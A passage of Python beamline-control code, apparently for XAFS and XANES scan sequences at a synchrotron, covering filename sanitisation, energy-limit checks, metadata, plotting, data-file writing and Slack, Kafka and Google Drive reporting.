(or whatever...)'))\n print(error_msg('then do: xs.measure_roi()'))\n return(yield from null())\n\n sub_dict = {'*' : '_STAR_',\n '/' : '_SLASH_',\n '\\\\': '_BACKSLASH_',\n '?' : '_QM_',\n '%' : '_PERCENT_',\n ':' : '_COLON_',\n '|' : '_VERBAR_',\n '\"' : '_QUOTE_',\n '<' : '_LT_',\n '>' : '_GT_',\n }\n vfatify = lambda m: sub_dict[m.group()]\n if p['usbstick']:\n new_filename = re.sub(r'[*:?\"<>|/\\\\]', vfatify, p['filename'])\n if new_filename != p['filename']: \n report('\\nChanging filename from \"%s\" to %s\"' % (p['filename'], new_filename), 'error')\n print(error_msg('\\nThese characters cannot be in file names copied onto most memory sticks:'))\n print(error_msg('\\n\\t* : ? % \" < > | / \\\\'))\n print(error_msg('\\nSee ')+url_msg('https://en.wikipedia.org/wiki/Filename#Reserved_characters_and_words'))\n p['filename'] = new_filename\n\n ## 255 character limit for filenames on VFAT\n # if len(p['filename']) > 250:\n # BMMuser.final_log_entry = False\n # print(error_msg('\\nYour filename is too long,'))\n # print(error_msg('\\nFilenames longer than 255 characters cannot be copied onto most memory sticks,'))\n # yield from null()\n # return\n\n\n bail = False\n cnt = 0\n for i in range(p['start'], p['start']+p['nscans'], 1):\n cnt += 1\n fname = \"%s.%3.3d\" % (p['filename'], i)\n if p['usbstick']:\n fname = re.sub(r'[*:?\"<>|/\\\\]', vfatify, fname)\n datafile = os.path.join(p['folder'], fname)\n if os.path.isfile(datafile):\n report('%s already exists!' % (datafile), 'error')\n bail = True\n if bail:\n report('\\nOne or more output files already exist! Quitting scan sequence....\\n', 'error')\n BMMuser.final_log_entry = False\n yield from null()\n return\n\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## user verification (disabled by BMMuser.prompt)\n if verbose: print(verbosebold_msg('computing pseudo-channelcut energy'))\n eave = channelcut_energy(p['e0'], p['bounds'], p['ththth'])\n length = 0\n if BMMuser.prompt:\n BMMuser.instrument = '' # we are NOT using a spreadsheet, so unset instrument\n text = '\\n'\n for k in ('bounds', 'bounds_given', 'steps', 'times'):\n addition = ' %-13s : %-50s\\n' % (k,p[k])\n text = text + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n for (k,v) in p.items():\n if k in ('bounds', 'bounds_given', 'steps', 'times'):\n continue\n if k in ('npoints', 'dwell', 'delay', 'inttime', 'channelcut', 'bothways'):\n continue\n addition = ' %-13s : %-50s\\n' % (k,v)\n text = text + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n if length < 75: length = 75\n for k in ('post_webcam', 'post_anacam', 'post_usbcam1', 'post_usbcam2', 'post_xrf'):\n addition = ' %-13s : %-50s\\n' % (k,getattr(user_ns['BMMuser'], k))\n text = text + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n if length < 75: length = 75\n boxedtext('How does this look?', text, 'green', width=length+4) # see 05-functions\n\n outfile = os.path.join(p['folder'], \"%s.%3.3d\" % (p['filename'], p['start']))\n print('\\nFirst data file to be written to \"%s\"' % outfile)\n\n print(estimate)\n\n if not dcm.suppress_channel_cut:\n if p['ththth']:\n print('\\nSi(111) pseudo-channel-cut energy = %.1f ; %.1f on the Si(333)' % (eave,eave*3))\n else:\n print('\\nPseudo-channel-cut energy = %.1f' % eave)\n\n action = input(\"\\nBegin scan sequence? \" + PROMPT)\n if action != '':\n if action[0].lower() == 'n' or action[0].lower() == 'q':\n BMMuser.final_log_entry = False\n yield from null()\n return\n\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## gather up input data into a format suitable for the dossier\n with open(inifile, 'r') as fd: content = fd.read()\n output = re.sub(r'\\n+', '\\n', re.sub(r'\\#.*\\n', '\\n', content)) # remove comment and blank lines\n clargs = textwrap.fill(str(kwargs), width=50) # .replace('\\n', '
')\n BMM_log_info('starting XAFS scan using %s:\\n%s\\ncommand line arguments = %s' % (inifile, output, str(kwargs)))\n BMM_log_info(motor_status())\n\n ## perhaps enter pseudo-channel-cut mode\n ## need to do this define defining the plotting lambda otherwise\n ## BlueSky gets confused about the plotting window\n #if not dcm.suppress_channel_cut:\n if p['channelcut'] is True:\n report('entering pseudo-channel-cut mode at %.1f eV' % eave, 'bold')\n dcm.mode = 'fixed'\n yield from attain_energy_position(eave)\n\n # dcm_bragg.clear_encoder_loss()\n # #if 'noreturn' in kwargs and kwargs['noreturn'] is not True:\n # yield from mv(dcm.energy, eave)\n # count = 0\n # while abs(dcm.energy.position - eave) > 0.1 :\n # if count > 3:\n # print(error_msg('Unresolved encoder loss on Bragg axis. Stopping XAFS scan.'))\n # BMMuser.final_log_entry = False\n # yield from null()\n # return\n # print('Clearing encoder loss and re-trying to move to pseudo-channel-cut energy...')\n # dcm_bragg.clear_encoder_loss()\n # yield from mv(dcm.energy, eave)\n # count = count + 1\n \n if p['rockingcurve']:\n report('running rocking curve at pseudo-channel-cut energy %.1f eV' % eave, 'bold')\n yield from rocking_curve()\n close_last_plot()\n RE.msg_hook = None\n if p['channelcut'] is True:\n dcm.mode = 'channelcut'\n\n\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## organize metadata for injection into database and XDI output\n print(bold_msg('gathering metadata'))\n md = bmm_metadata(measurement = p['mode'],\n experimenters = p['experimenters'],\n edge = p['edge'],\n element = p['element'],\n edge_energy = p['e0'],\n direction = 1,\n scantype = 'step',\n channelcut = True, # p['channelcut'],\n mono = 'Si(%s)' % dcm._crystal,\n i0_gas = 'N2', #\\\n it_gas = 'N2', # > these three need to go into INI file\n ir_gas = 'N2', #/\n sample = p['sample'],\n prep = p['prep'],\n stoichiometry = None,\n mode = p['mode'],\n comment = p['comment'],\n ththth = p['ththth'],\n )\n\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## measure XRF spectrum at Eave\n if 'xs' in plotting_mode(p['mode']) and BMMuser.lims is True:\n yield from dossier.capture_xrf(p['folder'], p['filename'], p['mode'], md)\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## snap photos\n if p['snapshots']:\n yield from dossier.cameras(p['folder'], p['filename'], md)\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## capture dossier metadata for start document\n md['_snapshots'] = {**dossier.xrf_md, **dossier.cameras_md}\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## this dictionary is used to populate the static html page for this scan sequence\n # see https://stackoverflow.com/a/5445983 for list of string idiom\n these_kwargs = {'start' : p['start'],\n 'end' : p['start']+p['nscans']-1,\n 'pccenergy' : eave,\n 'bounds' : ' '.join(map(str, p['bounds_given'])),\n 'steps' : ' '.join(map(str, p['steps'])),\n 'times' : ' '.join(map(str, p['times'])), }\n dossier.prep_metadata(p, inifile, clargs, these_kwargs)\n\n with open(os.path.join(BMMuser.DATA, inifile)) as f:\n initext = ''.join(f.readlines())\n user_metadata = {**p, **these_kwargs, 'initext': initext, 'clargs': clargs}\n md['_user'] = user_metadata\n\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## set up a plotting subscription, anonymous functions for plotting various forms of XAFS\n\n # switch between old ion chambers with QuadEM and new self-contained ICs\n i0 = 'I0' # 'I0a' or 'I0b'\n it = 'It' # 'Ita' or 'Itb'\n ir = 'Ir' # 'Ira' or 'Irb'\n \n test = lambda doc: (doc['data']['dcm_energy'], doc['data'][i0])\n trans = lambda doc: (doc['data']['dcm_energy'], numpy.log(doc['data'][i0] / doc['data'][it]))\n ref = lambda doc: (doc['data']['dcm_energy'], numpy.log(doc['data'][it] / doc['data'][ir]))\n Yield = lambda doc: (doc['data']['dcm_energy'], doc['data']['Iy'] / doc['data'][i0])\n if user_ns['with_xspress3'] and plotting_mode(p['mode']) == 'xs':\n xspress3_4 = lambda doc: (doc['data']['dcm_energy'], (doc['data'][BMMuser.xs1] +\n doc['data'][BMMuser.xs2] +\n doc['data'][BMMuser.xs3] +\n doc['data'][BMMuser.xs4] ) / doc['data'][i0])\n if user_ns['with_xspress3'] and plotting_mode(p['mode']) == 'xs1':\n xspress3_1 = lambda doc: (doc['data']['dcm_energy'], doc['data'][BMMuser.xs8] / doc['data'][i0])\n \n if BMMuser.detector == 1:\n fluo = lambda doc: (doc['data']['dcm_energy'], doc['data'][BMMuser.dtc1] / doc['data'][i0])\n else:\n fluo = lambda doc: (doc['data']['dcm_energy'], (doc['data'][BMMuser.dtc1] +\n doc['data'][BMMuser.dtc2] + # removed doc['data'][BMMuser.dtc3] +\n doc['data'][BMMuser.dtc4]) / doc['data'][i0])\n if 'fluo' in p['mode'] or 'flou' in p['mode']:\n if user_ns['with_xspress3']:\n yield from mv(xs.cam.acquire_time, 0.5)\n plot = DerivedPlot(xspress3_4, xlabel='energy (eV)', ylabel='If / I0 (Xspress3)', title=p['filename'])\n else:\n plot = DerivedPlot(fluo, xlabel='energy (eV)', ylabel='absorption (fluorescence)', title=p['filename'])\n elif 'trans' in p['mode']:\n plot = DerivedPlot(trans, xlabel='energy (eV)', ylabel='absorption (transmission)', title=p['filename'])\n elif 'ref' in p['mode']:\n plot = DerivedPlot(ref, xlabel='energy (eV)', ylabel='absorption (reference)', title=p['filename'])\n elif 'yield' in p['mode']:\n quadem1.Iy.kind = 'hinted'\n plot = [DerivedPlot(Yield, xlabel='energy (eV)', ylabel='absorption (electron yield)', title=p['filename']),\n DerivedPlot(trans, xlabel='energy (eV)', ylabel='absorption (transmission)', title=p['filename'])]\n elif 'test' in p['mode']:\n plot = DerivedPlot(test, xlabel='energy (eV)', ylabel='I0 (test)', title=p['filename'])\n elif 'both' in p['mode']:\n if user_ns['with_xspress3']:\n yield from mv(xs.cam.acquire_time, 0.5)\n plot = [DerivedPlot(trans, xlabel='energy (eV)', ylabel='absorption (transmission)', title=p['filename']),\n DerivedPlot(xspress3_4, xlabel='energy (eV)', ylabel='absorption (Xspress3)', title=p['filename'])]\n else:\n plot = [DerivedPlot(trans, xlabel='energy (eV)', ylabel='absorption (transmission)', title=p['filename']),\n DerivedPlot(fluo, xlabel='energy (eV)', ylabel='absorption (fluorescence)', title=p['filename'])]\n elif 'xs1' in p['mode']:\n yield from mv(xs1.cam.acquire_time, 0.5)\n plot = DerivedPlot(xspress3_1, xlabel='energy (eV)', ylabel='If / I0 (Xspress3, 1-element)', title=p['filename'])\n elif 'xs' in p['mode']:\n yield from mv(xs.cam.acquire_time, 0.5)\n plot = DerivedPlot(xspress3_4, xlabel='energy (eV)', ylabel='If / I0 (Xspress3, 4-element)', title=p['filename'])\n else:\n print(error_msg('Plotting mode not specified, falling back to a transmission plot'))\n plot = DerivedPlot(trans, xlabel='energy (eV)', ylabel='absorption (transmission)', title=p['filename'])\n\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## engage suspenders right before starting scan sequence\n if 'force' in kwargs and kwargs['force'] is True:\n pass\n else:\n BMM_suspenders()\n\n ## This helped Bruce understand how to make a decorator conditional:\n ## https://stackoverflow.com/a/49204061\n def conditional_subs_decorator(function):\n if user_ns['BMMuser'].enable_live_plots is True:\n return subs_decorator(plot)(function)\n else:\n return function\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## begin the scan sequence with the plotting subscription\n @conditional_subs_decorator\n def scan_sequence(clargs): #, noreturn=False):\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## compute energy and dwell grids\n print(bold_msg('computing energy and dwell time grids'))\n (energy_grid, time_grid, approx_time, delta) = conventional_grid(p['bounds'], p['steps'], p['times'], e0=p['e0'], element=p['element'], edge=p['edge'], ththth=p['ththth'])\n if plotting_mode(p['mode']) == 'xs':\n yield from mv(xs.total_points, len(energy_grid))\n if plotting_mode(p['mode']) == 'xs1':\n yield from mv(xs1.total_points, len(energy_grid))\n if energy_grid is None or time_grid is None or approx_time is None:\n print(error_msg('Cannot interpret scan grid parameters! Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n if any(t > 20 for t in time_grid):\n print(error_msg('Your scan asks for an integration time greater than 20 seconds, which the ion chamber electrometer cannot accommodate. Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n if any(y > 23500 for y in energy_grid):\n print(error_msg('Your scan goes above 23500 eV, the maximum energy available at BMM. Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n if dcm._crystal == '111' and any(y > 21200 for y in energy_grid):\n print(error_msg('Your scan goes above 21200 eV, the maximum energy value on the Si(111) mono. Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n if dcm._crystal == '111' and any(y < 2900 for y in energy_grid): # IS THIS CORRECT???\n print(error_msg('Your scan goes below 2900 eV, the minimum energy value on the Si(111) mono. Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n if dcm._crystal == '311' and any(y < 5500 for y in energy_grid):\n print(error_msg('Your scan goes below 5500 eV, the minimum energy value on the Si(311) mono. Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n\n\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## show the metadata to the user\n display_XDI_metadata(md)\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## store data in redis, used by cadashboard\n rkvs.set('BMM:scan:type', 'xafs')\n rkvs.set('BMM:scan:starttime', str(datetime.datetime.timestamp(datetime.datetime.now())))\n rkvs.set('BMM:scan:estimated', (approx_time * int(p['nscans']) * 60))\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## loop over scan count\n if BMMuser.enable_live_plots: close_last_plot()\n dossier.rid = str(uuid.uuid4())[:8]\n report(f'\"{p[\"filename\"]}\", {p[\"element\"]} {p[\"edge\"]} edge, {inflect(\"scans\", p[\"nscans\"])}',\n level='bold', slack=True, rid=dossier.rid)\n cnt = 0\n uidlist = []\n kafka_message({'xafs_sequence' : 'start',\n 'element' : p[\"element\"],\n 'edge' : p[\"edge\"],\n 'folder' : BMMuser.folder,\n 'repetitions' : p[\"nscans\"],\n 'mode' : p['mode']})\n refmat = 'none'\n if p[\"element\"] in user_ns['xafs_ref'].mapping:\n refmat = user_ns['xafs_ref'].mapping[p[\"element\"]][3]\n sample = p['sample']\n if len(sample) > 50:\n sample = sample[:45] + ' ...'\n kafka_message({'xafsscan': 'start',\n 'element': p[\"element\"],\n 'edge': p[\"edge\"],\n 'mode': p['mode'],\n 'filename': p[\"filename\"],\n 'repetitions': p[\"nscans\"],\n 'sample': sample,\n 'reference_material': refmat, })\n for i in range(p['start'], p['start']+p['nscans'], 1):\n cnt += 1\n fname = \"%s.%3.3d\" % (p['filename'], i)\n datafile = os.path.join(p['folder'], fname)\n if os.path.isfile(datafile):\n ## shouldn't be able to get here, unless a file\n ## was written since the scan sequence began....\n report('%s already exists! (How did that happen?) Bailing out....' % (datafile), 'error')\n yield from null()\n return\n\n \n ## this block is in the wrong place. should be outside the loop over repetitions\n ## same is true of several more things below\n slotno, ring = '', ''\n if 'wheel' in BMMuser.instrument.lower():\n slotno = f', slot {xafs_wheel.current_slot()}'\n ring = f' {xafs_wheel.slot_ring()} ring'\n dossier.instrument = xafs_wheel.dossier_entry();\n elif 'glancing angle' in BMMuser.instrument.lower():\n slotno = f', spinner {ga.current()}'\n dossier.instrument = ga.dossier_entry();\n elif 'lakeshore' in BMMuser.instrument.lower():\n slotno = f', temperature {lakeshore.readback.get():.1f}'\n dossier.instrument = lakeshore.dossier_entry();\n elif 'linkam' in BMMuser.instrument.lower():\n slotno = f', temperature {linkam.readback.get():.1f}'\n dossier.instrument = linkam.dossier_entry();\n # this one is a bit different, get dossier entry from gmb object,\n # there is no grid object....\n elif 'grid' in BMMuser.instrument.lower():\n slotno = f', motor grid {gmb.motor1.name}, {gmb.motor2.name} = {gmb.position1:.1f}, {gmb.position2:.1f}'\n dossier.instrument = gmb.dossier_entry();\n\n \n report(f'starting repetition {cnt} of {p[\"nscans\"]} -- {fname} -- {len(energy_grid)} energy points{slotno}{ring}', level='bold', slack=True)\n md['_filename'] = fname\n\n if plotting_mode(p['mode']) == 'xs':\n yield from mv(xs.spectra_per_point, 1) \n yield from mv(xs.total_points, len(energy_grid))\n hdf5_uid = xs.hdf5.file_name.value\n if plotting_mode(p['mode']) == 'xs1':\n yield from mv(xs1.spectra_per_point, 1) \n yield from mv(xs1.total_points, len(energy_grid))\n hdf5_uid = xs1.hdf5.file_name.value\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## compute trajectory\n energy_trajectory = cycler(dcm.energy, energy_grid)\n dwelltime_trajectory = cycler(dwell_time, time_grid)\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## need to set certain metadata items on a per-scan basis... temperatures, ring stats\n ## mono direction, ... things that can change during or between scan sequences\n \n md['Mono']['direction'] = 'forward'\n if p['bothways'] and cnt%2 == 0:\n energy_trajectory = cycler(dcm.energy, energy_grid[::-1])\n dwelltime_trajectory = cycler(dwell_time, time_grid[::-1])\n md['Mono']['direction'] = 'backward'\n yield from attain_energy_position(energy_grid[-1]+5)\n #dcm_bragg.clear_encoder_loss()\n #yield from mv(dcm.energy, energy_grid[-1]+5)\n else:\n ## if not measuring in both direction, lower acceleration of the mono\n ## for the rewind, explicitly rewind, then reset for measurement\n yield from mv(dcm_bragg.acceleration, BMMuser.acc_slow)\n print(whisper(' Rewinding DCM to %.1f eV with acceleration time = %.2f sec' % (energy_grid[0]-5, dcm_bragg.acceleration.get())))\n yield from attain_energy_position(energy_grid[0]-5)\n #dcm_bragg.clear_encoder_loss()\n #yield from mv(dcm.energy, energy_grid[0]-5)\n yield from mv(dcm_bragg.acceleration, BMMuser.acc_fast)\n print(whisper(' Resetting DCM acceleration time to %.2f sec' % dcm_bragg.acceleration.get()))\n \n rightnow = metadata_at_this_moment() # see metadata.py\n for family in rightnow.keys(): # transfer rightnow to md\n if type(rightnow[family]) is dict:\n if family not in md:\n md[family] = dict()\n for k in rightnow[family].keys():\n md[family][k] = rightnow[family][k]\n \n md['_kind'] = 'xafs'\n md['_pccenergy'] = round(eave, 3)\n\n if p['ththth']: md['_kind'] = '333'\n if plotting_mode(p['mode']) == 'xs1':\n md['_dtc'] = (BMMuser.xs8,)\n elif plotting_mode(p['mode']) == 'xs':\n md['_dtc'] = (BMMuser.xs1, BMMuser.xs2, BMMuser.xs3, BMMuser.xs4)\n else:\n md['_dtc'] = (BMMuser.dtc1, BMMuser.dtc2, BMMuser.dtc3, BMMuser.dtc4)\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## metadata for XDI entry in start document\n xdi = {'XDI': md}\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## call the stock scan_nd plan with the correct detectors\n uid = None\n more_kafka = {'filename': p[\"filename\"],\n 'folder': BMMuser.folder,\n 'element': p[\"element\"],\n 'edge': p[\"edge\"],\n 'repetitions': p[\"nscans\"],\n 'count': cnt, }\n kafka_message({'xafsscan': 'next',\n 'count': cnt })\n if any(md in p['mode'] for md in ('trans', 'ref', 'yield', 'test')):\n uid = yield from scan_nd([quadem1, ic0], energy_trajectory + dwelltime_trajectory,\n md={**xdi, **supplied_metadata, 'plan_name' : f'scan_nd xafs {p[\"mode\"]}',\n 'BMM_kafka': { 'hint': f'xafs {p[\"mode\"]}', **more_kafka }})\n elif any(md in p['mode'] for md in ('icit', 'ici0')):\n uid = yield from scan_nd([quadem1, ic0], energy_trajectory + dwelltime_trajectory,\n md={**xdi, **supplied_metadata, 'plan_name' : f'scan_nd xafs {p[\"mode\"]}',\n 'BMM_kafka': { 'hint': f'xafs {p[\"mode\"]}', **more_kafka }})\n elif user_ns['with_xspress3'] is True and plotting_mode(p['mode']) == 'xs':\n uid = yield from scan_nd([quadem1, ic0, xs], energy_trajectory + dwelltime_trajectory,\n md={**xdi, **supplied_metadata, 'plan_name' : 'scan_nd xafs fluorescence',\n 'BMM_kafka': { 'hint': 'xafs xs', **more_kafka }})\n elif user_ns['with_xspress3'] is True and plotting_mode(p['mode']) == 'xs1':\n uid = yield from scan_nd([quadem1, ic0, xs1], energy_trajectory + dwelltime_trajectory,\n md={**xdi, **supplied_metadata, 'plan_name' : 'scan_nd xafs fluorescence',\n 'BMM_kafka': { 'hint': 'xafs xs1', **more_kafka }})\n else:\n uid = yield from scan_nd([quadem1, ic0, vor], energy_trajectory + dwelltime_trajectory,\n md={**xdi, **supplied_metadata, 'plan_name' : 'scan_nd xafs fluorescence',\n 'BMM_kafka': { 'hint': 'xafs analog', **more_kafka }})\n\n ## here is where we would use the new SingleRunCache solution in databroker v1.0.3\n ## see #64 at https://github.com/bluesky/tutorials\n\n kafka_message({'xafs_sequence' :'add',\n 'uid' : uid})\n #kafka_message({'xafs_visualization' : uid,\n # 'element' : p[\"element\"],\n # 'edge' : p[\"edge\"],\n # 'folder' : BMMuser.folder,\n # 'mode' : p['mode']})\n \n if 'xs' in plotting_mode(p['mode']):\n hdf5_uid = xs.hdf5.file_name.value\n \n uidlist.append(uid)\n header = db[uid]\n write_XDI(datafile, header)\n print(bold_msg('wrote %s' % datafile))\n BMM_log_info(f'energy scan finished, uid = {uid}, scan_id = {header.start[\"scan_id\"]}\\ndata file written to {datafile}')\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## data evaluation + message to Slack\n ## also sync data with Google Drive\n if any(md in p['mode'] for md in ('trans', 'fluo', 'flou', 'both', 'ref', 'xs', 'xs1', 'yield')):\n try:\n score, emoji = user_ns['clf'].evaluate(uid, mode=plotting_mode(p['mode']))\n report(f\"ML data evaluation model: {emoji}\", level='bold', slack=True)\n if score == 0:\n report(f'An {emoji} may not mean that there is anything wrong with your data. See https://tinyurl.com/yrnrhshj', level='whisper', slack=True)\n with open('/home/xf06bm/Data/bucket/failed_data_evaluation.txt', 'a') as f:\n f.write(f'{now()}\\n\\tmode = {p[\"mode\"]}/{plotting_mode(p[\"mode\"])}\\n\\t{uid}\\n\\n')\n except:\n pass\n if p['lims'] is True:\n try:\n if not is_re_worker_active():\n rsync_to_gdrive()\n synch_gdrive_folder()\n except Exception as e:\n print(error_msg(e))\n report(f'Failed to push {fname} to Google drive...', level='bold', slack=True)\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## generate left sidebar text for the static html page for this scan sequence\n js_text = f'#{header.start[\"scan_id\"]}
{uid}
'\n ##% (fname, fname, header.start['scan_id'], fname, uid)\n printedname = fname\n if len(p['filename']) > 11:\n printedname = fname[0:6] + '···' + fname[-5:]\n dossier.scanlist += f'
  • {printedname}    {js_text}
  • \\n' \n # % (quote(fname), fname, printedname, js_text)\n\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## finish up, close out\n dossier.uidlist = uidlist\n dossier.seqend = now('%A, %B %d, %Y %I:%M %p')\n print('Returning to fixed exit mode') # and returning DCM to %1.f' % eave)\n dcm.mode = 'fixed'\n #yield from mv(dcm_bragg.acceleration, BMMuser.acc_slow)\n #dcm_bragg.clear_encoder_loss()\n #yield from mv(dcm.energy, eave)\n #yield from mv(dcm_bragg.acceleration, BMMuser.acc_fast)\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## execute this scan sequence plan\n yield from scan_sequence(clargs) #, noreturn)\n\n def cleanup_plan(inifile):\n print('Finishing up after an XAFS scan sequence')\n BMM_clear_suspenders()\n\n #db = user_ns['db']\n ## db[-1].stop['num_events']['primary'] should equal db[-1].start['num_points'] for a complete scan\n how = 'finished :tada:'\n try:\n if 'primary' not in db[-1].stop['num_events']:\n how = '*stopped* :warning:'\n elif db[-1].stop['num_events']['primary'] != db[-1].start['num_points']:\n how = '*stopped* :warning:'\n except:\n how = '*stopped* :warning:'\n if BMMuser.final_log_entry is True:\n report(f'== XAFS scan sequence {how}', level='bold', slack=True)\n BMM_log_info(f'most recent uid = {db[-1].start[\"uid\"]}, scan_id = {db[-1].start[\"scan_id\"]}')\n ## FYI: db.v2[-1].metadata['start']['scan_id']\n #if dossier.htmlpage:\n try:\n htmlout = dossier.write_dossier()\n except Exception as E:\n report('Failed to write dossier', level='error', slack=True)\n print(error_msg('Here is the exception message:'))\n print(E)\n htmlout, prjout, pngout = None, None, None\n if htmlout is not None:\n report(f'wrote dossier {os.path.basename(htmlout)}', level='bold', slack=True)\n kafka_message({'xafsscan': 'stop',})\n kafka_message({'xafs_sequence':'stop', 'filename':os.path.join(BMMuser.folder, 'snapshots', f'{dossier.basename}.png')})\n if not is_re_worker_active():\n rsync_to_gdrive()\n synch_gdrive_folder()\n \n dcm.mode = 'fixed'\n yield from resting_state_plan()\n yield from sleep(2.0)\n yield from mv(dcm_pitch.kill_cmd, 1)\n yield from mv(dcm_roll.kill_cmd, 1)\n\n RE, BMMuser, dcm, dwell_time = user_ns['RE'], user_ns['BMMuser'], user_ns['dcm'], user_ns['dwell_time']\n dcm_bragg, dcm_pitch, dcm_roll, dcm_x = user_ns['dcm_bragg'], user_ns['dcm_pitch'], user_ns['dcm_roll'], user_ns['dcm_x']\n xafs_wheel, ga, linkam, gmb, lakeshore = user_ns['xafs_wheel'], user_ns['ga'], user_ns['linkam'], user_ns['gmb'], user_ns['lakeshore']\n rkvs = user_ns['rkvs']\n\n try:\n dualio = user_ns['dualio']\n except:\n pass\n \n ######################################################################\n # this is a tool for verifying a macro. this replaces an xafs scan #\n # with a sleep, allowing the user to easily map out motor motions in #\n # a macro #\n if BMMuser.macro_dryrun:\n inifile, estimate = howlong(inifile, interactive=False, **kwargs)\n (p, f) = scan_metadata(inifile=inifile, **kwargs)\n if 'filename' in p:\n print(info_msg('\\nBMMuser.macro_dryrun is True. Sleeping for %.1f seconds at sample \"%s\".\\n' %\n (BMMuser.macro_sleep, p['filename'])))\n else:\n print(info_msg('\\nBMMuser.macro_dryrun is True. Sleeping for %.1f seconds.\\nAlso there seems to be a problem with \"%s\".\\n' %\n (BMMuser.macro_sleep, inifile)))\n countdown(BMMuser.macro_sleep)\n return(yield from null())\n ######################################################################\n dossier = BMMDossier()\n dossier.measurement = 'XAFS'\n BMMuser.final_log_entry = True\n RE.msg_hook = None\n if BMMuser.lims is False:\n BMMuser.snapshots = False\n BMMuser.htmlout = False\n else:\n BMMuser.snapshots = True\n BMMuser.htmlout = True\n \n if is_re_worker_active():\n inifile = DEFAULT_INI\n if inifile is None:\n inifile = present_options('ini')\n if inifile is None:\n return(yield from null())\n if inifile[-4:] != '.ini':\n inifile = inifile+'.ini'\n yield from finalize_wrapper(main_plan(inifile, **kwargs), cleanup_plan(inifile))\n RE.msg_hook = BMM_msg_hook\n\n\ndef xanes(filename=None, step=2):\n '''Measure one repetition of a quick-n-dirty XANES scan from -30 to\n +40 using the element and edge currently reported by redis.\n\n attributes\n ==========\n filename: str\n Filename stub, default is {el}-{ed}-testXANES\n\n step: float\n step size in eV, default is 2 eV\n\n '''\n rkvs = user_ns['rkvs']\n params = {'bounds' : '-30 -10 20 40', 'steps' : f'5 {step} {step*2}', 'times': '0.5 0.5 0.5'}\n el = rkvs.get(\"BMM:pds:element\").decode(\"utf-8\")\n ed = rkvs.get(\"BMM:pds:edge\").decode(\"utf-8\")\n if filename is None:\n filename = f'{el}-{ed}-testXANES'\n comment = 'quick-n-dirty XANES scan'\n yield from xafs(DEFAULT_INI, filename=filename, element=el, sample=comment, prep=comment, comment=comment,\n mode='both', edge=ed, experimenters='', snapshots=False, **params)\n \n\ndef howlong(inifile=None, interactive=True, **kwargs):\n '''\n Estimate how long the scan sequence in an XAFS control file will take.\n Parameters from control file are composable via kwargs.\n\n Examples\n --------\n Interactive (command line) use:\n \n >>> howlong('scan.ini')\n\n Non-interactive use (for instance, to display the control file contents and a time estimate):\n \n >>> howlong('scan.ini', interactive=False)\n\n '''\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## user input, find and parse the INI file\n ## try inifile as given then DATA + inifile\n ## this allows something like RE(xafs('myscan.ini')) -- short 'n' sweet\n if is_re_worker_active():\n inifile = '/nsls2/data/bmm/shared/config/xafs/scan.ini'\n BMMuser = user_ns['BMMuser']\n if inifile is None:\n inifile = present_options('ini')\n if inifile is None:\n return('', -1)\n if inifile[-4:] != '.ini':\n inifile = inifile+'.ini'\n orig = inifile\n if not os.path.isfile(inifile):\n inifile = os.path.join(BMMuser.DATA, inifile)\n if not os.path.isfile(inifile):\n print(warning_msg('\\n%s does not exist! Bailing out....\\n' % orig))\n return(orig, -1)\n print(bold_msg('reading ini file: %s' % inifile))\n (p, f) = scan_metadata(inifile=inifile, **kwargs)\n if not p:\n print(error_msg('%s could not be read as an XAFS control file\\n' % inifile))\n return(orig, -1)\n (ok, missing) = ini_sanity(f)\n if not ok:\n print(error_msg('\\nThe following keywords are missing from your INI file: '), '%s\\n' % str.join(', ', missing))\n return(orig, -1)\n (energy_grid, time_grid, approx_time, delta) = conventional_grid(p['bounds'], p['steps'], p['times'], e0=p['e0'], element=p['element'], edge=p['edge'], ththth=p['ththth'])\n if delta == 0:\n text = f'One scan of {len(energy_grid)} points will take about {approx_time:.1f} minutes\\n'\n text +=f'The sequence of {inflect(\"scan\", p[\"nscans\"])} will take about {approx_time * int(p[\"nscans\"])/60:.1f} hours'\n else:\n text = f'One scan of {len(energy_grid)} points will take {approx_time:.1f} minutes +/- {delta:.1f} minutes \\n'\n text +=f'The sequence of {inflect(\"scan\", p[\"nscans\"])} will take about {approx_time * int(p[\"nscans\"])/60:.1f} hours +/- {delta*numpy.sqrt(int(p[\"nscans\"])):.1f} minutes'\n\n\n if 